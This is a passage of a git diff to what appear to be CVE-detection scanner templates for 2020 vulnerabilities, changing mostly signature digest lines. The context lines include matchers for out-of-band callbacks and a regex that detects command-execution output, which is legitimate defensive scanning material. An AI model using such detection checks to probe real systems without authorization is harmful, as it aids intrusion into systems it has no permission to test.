490a0046304402203c3cf5580aa4db762ce68e2d12fc511beee50a7a1ff3a9a6c60d6a1082ae0f1102202fe9e217585a223c676c328ded6295a13fad15288bb824182301e27ecd2c0bb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index b2e1bb7912..af67953d7e 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d8c3150b6b8a8c0f5c30dc6af03f5ed59f49c7172d5b9c124b0069156c4632002202f26a4fd67b93582ef66040e621eed506f3dc6444c34de7e52f2f8a70cd39ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec03ccaf8d59fb6b4355b6188f4cecad9817f38ce889c7ed6046257af6e24b38022100c88ef66de3fb9773d33608a6df27e242486e0571ebdc0fc6fea38832eeb9a01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index 50c9435141..cc8f1bb510 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ce54269cc6013cc9dfacbcc071ea4ec6aeb9b2705d6dcf5d2f9933efe2f52ac60221009e908e358415d47143c5e20bb6c85ed1313738eef89b12ad1a30fca1ba8d1412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c5a6a1a0ba24a3efcd4278d0ab2bc16bba05dd186836362b6c3549e086497630220531be7ad858018fbeeff5ab2bc61f58ae75b603553e653582df29ee771dd882c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index dc1cabe26e..1d0f4528a1 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d4bbb411b6f9450007b1b9edaf58699836267245aed9689e95282ebc0fdf4f59022100f73bac44bd11fc2c9c9d451ee9ba4fe317798489718c97090e5aeeafff66d668:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a2d8636097293b05f5d8d16d56f8b8c8e8c769609536b589b787cf244da0e45022100ab22552ea20a35ee593281bb817e9e64f75e5b9c49601a0c2b2d2fcb0137a804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index a79f2bfa25..0adb06cb83 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022006e28c04c6e659e78912043952b0271d2aeef3c1bf3f0bac0fdea8cb76ee8171022100fee8c07cb484ee92a3c0a9102ef9de1b8d6429e5398848261f05f3a3b9507fa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f656b6ff200968ecf88fc72175af181dd93db9241900173d0b1c44d111c3c6be022060232e6f5fd6e2e507ed3d05b22b6689f78fdf1c7e98b17bd9c7d25dd48732ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index 98bffa6d05..bf90c6d345 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205447757079347b8070e89fe60975aa83c5f776a495770b9fe12acf27f046e0030220569d1f8e17b6d601ebb193264cb7fab1e1dea5fdb12a553bd34fd8f502786c21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202662f3efba8ad4fa6c4bd4eda85a86f4d60bb28f37bc67a89825d2b729a9553402210099ecddb0b9cde3c2562289b3040b8437a617d1d355c9d9792ec5196bf23f71e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index c8079f3177..925ceabce0 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -58,4 +58,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4b0a00483046022100c8831b7a79e58b4e7a67c451f73d3cfb37a6ef3e8e5c080eadc921d72b3f7337022100c542e5c9d7531e4b3e781bbd0655fda3a0f3e96ccce83923abd4935aa15564ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072615c0b0413fad56bc12baf77315c68d55455a08feb9ee2cd445821b41b7f6e022100e7396565ecdedd7cace3b451976ced796bbff7d08bf8ec4db3507bb722269b04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 2796e6885d..aa2eedd675 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c9b0b05dd0d5566e148b27219b5d138bebd927b962661d892abffc7ab6c129a022100c423a96886f0bd34eb700de5fdb5508c514ad9ab63c39a03069d86fa47b9139f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022051a3134fc5f1915833892b85fa1365f58eabd71c5edd9c4d0e5703ce34ec179302202f35ab994046066a9d4d3eff76ed0fceace2fda5aa75b1a08ccc23e41b568d9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index bd330c1754..da7ff94265 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100d8797af312f8278f5b2970883e169d0005026e8cf66544ea1c56f941fa37a2ab022100f9e0d410a6eafe296be9a17b89b19819a22377b358619a3abc0d1ec6df6e69ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f32fac0aa8d548e9248b35103897d1472703d6a32bca8c446ba4f1fb9b59d6cb02200e8b61012f8840dda673f78b261f0647fd16af57384cb37b5e358a4c28d14a7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index e6d5ba3cae..93562827b0 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -56,4 +56,4 @@ http: - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')" - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')" condition: or -# digest: 4b0a0048304602210089c6dea6d48684d424ba49681ecb0835c3fda1e87848d90511a39562e7ec6cda022100dd4f07c17897a40e424f03c994207533a61c994bcffab2a1306cb1ef3585a6cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e0fdeee5368da1ac4520688c142084a0d8b734d3f3dc2364e07265293d3752e502201bd30580efd05d773cfc766effb15628ba4ec6272220898762fa420fe55846f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index 0d6cd0c2db..e6a7925479 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201687a011b3c1d0b082df0fc4bf771617cb0349de4cba006052c27eaba7755f79022100c31de3ab11f6116e0df6b8b2ca349dd4cd9dfbeb7bf1ab32871215d871c1cdbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f46ffc582deb51e533a86dc1fc6d4d941398347583eb7e8ca02e4b13707992c8022100cfd1b655dcf1bb46c7ef45b0d838ad0a2bc161b977782941f0c13052a9b19971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 6727f23c8e..9e95793cbf 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220110601b1a49a68747b9aa3b13bbe9aa31125a8ecb69aea5635e8059b9bccb9cd022100f2d774931b5d7cf5e4fe62bce02077170a346d8e7b43b5fb0bc05e13ef852e8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220279e03501ba082d6f13b2ee38054e5efc91620b3fe82e51ddb94bb7f89161a4b0220539bd79220bce8e69e74a7f3a255bde51c7f0305a7f50ac4dbe4b41ee6be3e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index d1a2ffdb2e..6723aeb449 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 200' - 'contains(body, "Hotel Booking System")' condition: and -# digest: 4a0a00473045022100ea99d63de90c17ef69343663ae409245371b719ba54e6602d603d1104a3cad99022075d17848133ba876d97f93a848b051ebb60d538253ef1ba0dc3a1c8f0df532fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206a88819f2a86877b474553fa4d72a8497496bda2b7febbd32b1d01a50895f70f0220064783fae9efeb7a0a87128c5598da4c150295bc3d5edc3c723dd92cf3bdf564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index b7acdfb1a4..7206405571 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -65,4 +65,4 @@ http: - type: kval kval: - x_jenkins -# digest: 490a0046304402204719e69a3d9212bc5a83bc0637aa260c0f1a472289337a06a0795d661772b79a02203d747ba49dfc9831db6ee04e4a534db4d514e8afd98b86e178e116bf4de12837:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202354f112a56f1ae70a3b5ccd8ed37eb1c66ecde2c75ae067591bb47cda8120df022100d43276d553bfd311f13969af700bcae074ca90d9c3ec06fcc042833fdff09298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 7255e5e5be..2347f306a9 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022067a92ac8b7c22a4e10a1ee56656b6be594ea35020ea4799e5af8d2eef94cbbb102204d477f10be4ca3adbda2c9b72bb5526b256b068fcfe7e18923bea002242295d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022062e1de2b70b56720e833b1f4fb60be1f04725c5346d1b69a78e08535f21f7202022001fd3012f4f4ece788b994cccc812dda2d92160038e808f9b9bed1573ed4954b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 6025551523..e1ff6900d9 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -42,4 +42,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4b0a00483046022100b445b86b8bc851dfc73d48b1385c99d7ad711230fa56e43efd02d7755d29ea84022100bfc90c7ba695df767a9f32c5eb3a29bf895e0af68b1d4c163438eaf8bfc221b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a2f8e688066f0bf78b4ec30e42371cdcfbd6163f995127448631eb8c36f8da5f02201b8d6b4e4092a47507ca2b42459fcf3da8d0bc221c89e8c70b605abe10f18379:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 137f120d57..b01d16360b 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -44,4 +44,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a004730450221009e55b332e27a60cf87cccd81422880062f90e44d254777bb1ec7f9140fa0054502205fddccf82cfe56707866b8766e8b74347aef1bf754927ccb40079bb273c5b359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059525c62ce6e84a6139fb32be4e0ac407b3214a0a55d0c92455379d33a54676f022100845435da58a71d7dff6dc5ef5c2318d7d51e38ac98d2eb90a62aca375f4a526b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 71d65d54bc..bd4d0224a3 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -42,4 +42,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a00473045022100871fd309f948d3202f0de9e37571c921c7c90656777d3fd15ab38733ad2408c102204f62211c931f9e30ab1ff0bf20bb503191ed0af758f8fe2b0373f48ec8bcd315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100936088574c536f79ad97ead1e884e8e6f07631923462c9e2816709d350c2219c02206ee0d19db59a932db37e1174fef33662049d86f69dbf60116cd52c7fbedeb0a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index ac7a1d257c..b50cb137d1 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -42,4 +42,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 490a00463044022071b6a405d90f0054834aa1c5c3703f7bcb45b4f903a6bc652d448f4538db822a02200b1db00826ae2aff686f2d3c41ac214901596ef82ccf7dd22d40e04364765372:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220526bec7134f0a7e30dc2c18d05cd0a15c7236eea798996f61b0a30b2f25679b7022100c0d2a8f60b929351c19fe62be4957ce929b27253d7af1d2a301e46949e00d646:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index db201321a1..667627c361 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4a0a00473045022100ae77234850dda3e92b7d3c070dd3f65e32ec805f1ebe87e6bf894a33e0bcee1802201e520db0d31b87bd98524bf3edc556e65db0ce4929df90d482ddf582fe4457b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7692af826a553f554b1aaae243cbb0f1735a12d9a2be7930ebce8071d514ae802203ad5938318568124585ab423e3afa8746c3a5089d34d4f16d6e4f996993fa80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 90a5e336be..96381db450 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b35fbfad637dec46e02dd52e3937c9a7946b832a92b5a742cda3d4a51e77d0ec02207e01bdf1cc3c1558864bc97d6685f1c982f8ecf5c977021caae8a5c017963601:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b879dfcedefeec8e77a0f23607f84fd9daf70f6481881e65fe17a2ef8267e1902201dacbd3ac31b08a3eb15d8242e03d93927d46b1f5c6037be98c80050ae678a47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index b7b83f77e9..fff904bdb6 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f12eef681cfdc5b25284c5454a90ded2df8a57c3ce88dc0b02c875889c55b3d022024a97cc9f5593bc334188272f41626107d090fd8b46cc923f55db4fecd61205f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abbf63b9229ba0217fe85b757de401441110be4df4db05558bfba4e8c8bc299f022023b4dd6e7711546f8028881e69d2dede18db1489ae303dfde57ca2749a90f14a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index 21cd1ee210..7f021b9aed 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -71,4 +71,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 490a004630440220388c291d21538ae9468cbf1003d57432e845e76f6e5ca57401c295990dbfa3c802201e068fb257170a9fd9eb666b68ebba98a088c87a3f79ab04d71631a4170816d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cae69f96e8d3f848fcc91d7f13fa209d1a7474e8ef0d0eb2205d8fdcd457c439022100ed3001e46464cdeeeb3500372afe02eb3c6ae9c3554c163cea11ac1b119eafd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 5c30f563dd..182530cf77 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -56,4 +56,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a004730450221008907b33fa8964132104119ef61c647b4ac492fb6758e4d425a2e2e06c366b968022006bc6c08457da183de8a277b67987bfcd2c316abba26adfeb9d24a31aed2b689:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206438adc9577bc1983c31950c82e68017eb54d222a07044e640696033b2b55cec0220306848d8e0c13a7fa6d8aaffd80dc5af414a779526851ec95fe9325e7c6720a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index a11fbbd5a2..ed664c5685 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -97,4 +97,4 @@ http: regex: - '"url":"([a-z:\\/0-9-.]+)"' part: body -# digest: 4b0a00483046022100e38932a4bbaeb966d0ff133b826f339af5d5ced828fa938d65afd4ca069940b602210086ec11b8bf600caea0125a35dd2eab8c0843a0335c30b73c7a29838c73c03bca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072ed0f4b5782100ff0dee8c88d2f3d5fe97194113652c1db44b0c64922842561022100929951c15416da76ada640267baafb313d4fde4abed2bdfc1e9783b5f6d0a279:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index cf1285a2b9..bf2895a6d1 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220457039ce0d9472c9c7f31b2390ffa8f660ae48086aaac7e0cbc18f819873abc502206ba999750bee55d9e2bf5bda1c630a0706596ba612b1c1c330e5e33e913b46ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c98c927aeafcbd1a6adf21b5d21faf57aab5c79a2a58d2cdfec24bf064a1c9d022072cd720a6236cc17b4aeb69b4aeeb9ad1a5fa0285b4f437055d27674847d55c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index a6fc48b68f..f3e5ef970a 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -62,4 +62,4 @@ http: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# digest: 4a0a0047304502200b7220be48731b335cab21f60260aa54175107f3ff242575a13060dbca77c791022100ef30764fd9c95d17d3e63194c798c924ddbff9e0b7835808965f3d535a3b783e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022071a22b59e3348ed8ba27141f47e9ae1bca53e0c6e6d939df8dce5209486e0f4002207ebb1c95c7da917ab83f9a3b538bd350070a303f44794d0f3076369ef950755e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 7e7da2b9eb..9a9e6f1656 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220066bfa74b2f1b728ce53f16ab6639e0ff98246333be3a0ad3fe83f7c64c33bb6022100eaac438fe3d62f74001b2af20f8088179ba40ea0e089b87468ccea9a4689a3d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d0dad0d3f149ea75ab9ebf58b63e74ae1eea82f25ab618bf8ac84db06cb010da0221008f5aecf038a76df56a89d047b1fc34d347b314b4608b213a037a8149cc68d981:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 59d9e17037..b471b0e998 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -51,4 +51,4 @@ http: part: body words: - "Failed to install the generic artifact type" -# digest: 4b0a0048304602210090a4585860b08882e0a74df9f647083b80f77dac5ad0dd1b23edda572fabe9f7022100bd4d26f2655c26e67675437452a7565ec16e27eaeb99d4cd108cc9101d9dfc3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a46002c04b61e32de82a96a52b9b729882e74fa21aaaea3fc4c33bac965f7897022010b04d7670233afd72f3ee1137579adc1b40f09a0b771f769deba4e19d5069e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index 8ac6e19024..213473fe25 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a2cdebb20e18eaa890cfc50613c3066fe88508ab4895439e1e93c3be8538e21e0221009989389686769e0e936f56b8d0c418beb0c14d427c1d13f1eb05dbd4f49ffacc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fbd977612352f0dbc57fc3116dd0173e5956ea43743ff80cbff7b4741e2b7410022100aea4f9ac38a84e79ec13760d398472a7d7b2d5a7534700d083a56e89868373a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index fe24e7e56c..99a4d2cb28 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cc3315a626f72938e1bbd0b8d6123c0a4e45d1f6f608ec22fc41d9b038f25b6d022045f6709f3c37e878675f5ea3caf6f393801ac2d1c850932a039abd8066a934a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c73f9c7d042051620e75c32001daf5e2ff74b05bddc153e04181ff239e33ec3022100dc7cb39e3db47baf79e6dee1450892b325dafc661450aaa1cda60304a42ed88c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index ce62d05cfc..9292fceb45 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008dc31b494c720948586f64df0d6c82addb71bac56f1d7b99d5b94d7c7d698c20022100fdc628af73a6fc813bb7c98900e81ba79c49b4eeafc5fe53895b55f7c2cfb055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207738b2066386fd459e0b9ac89d7d2e288a4e34648fb01f90ec71c0e21fa03ae50220175ca7faf47c6e694fd4e185116169a7ef825b5cef23676ab7b5d04d228a5bfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 308f2afbe1..f47abe96cb 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -52,4 +52,4 @@ http: part: header words: - 'Content-Type: text/html' -# digest: 4a0a00473045022100a91523e9be74d0fdb90d90a1c3d215030746d376affcf30c8322918bde098fce0220595f4f0288fb85dad8ad6bc73fc2da9fb28c78ed25c2efe66c9d8fdafef1f1a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201284fc9743bbc71a2debc287e5b7df8dd6c308b45e77fae4f747b7b6898bb91202204e779ee77aab819050cc1bb71ab2186a94731f6917e8dc308a48919697259d0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index 9a0e51e49b..68a90dcc0a 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -79,4 +79,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009764a3380b69d4ec8408e92d8ba889960fbf555098f4ec27add5b2b49a5a6f0e022100edd60e97f49ac3c83ab4d31e41a127aec179ded13d84394542e9ec386121fb1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f81ace544937588a6d8d8eb3e27477753548e12b0bc8be2225c631fbe79db914022100f85f3adefb3718f509c523fb5addf2ed503818ce0bd802055f6c5ae9469ab7d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index 03e13e70b3..e352869ebc 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -57,4 +57,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502205dc1664f5c457024a05322ea4f90f1b555fa287fa88d891fdd22ab9f01254c6f022100a2775475c594fb68dc732630b5d0861715e7d2b5e50722a65a2206ffcd920929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff6dc32d4259c76f602a5881b869f0b86187c42a75caee8ef34b68e8dc28d74502200812acfb06dd5d961a892bf16f306744b40f7ce367eb835878d8a37e2fa15322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index 3fc5fbcc3a..77f558a5c4 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -57,4 +57,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 4a0a004730450221008603407556f5d86d00fc35eb29d8dfabfafad112a165be5c7341165845aac25802204d9d3505889d5f2e6e0aaf6df6add1895a70a6f9ebfed6e2022cb1654f9e342f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210087f9fda321acac1cfec59ea26884ff17883f6578cbb15be1a787358a943732730220051d4c4fafdee0ca2c78245e67b43a6e72988d334ddb685ca84234247fcccabc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index d64fd22ac7..23966e9388 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202870c3b1ea333869c202cd0988502ae3b1582d4b38ce1c7db483240b803ea92502203c70ee8d4e58c93bdeb345eff7fe2b91ff4f7d767a012e2b2ff738febbddedf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 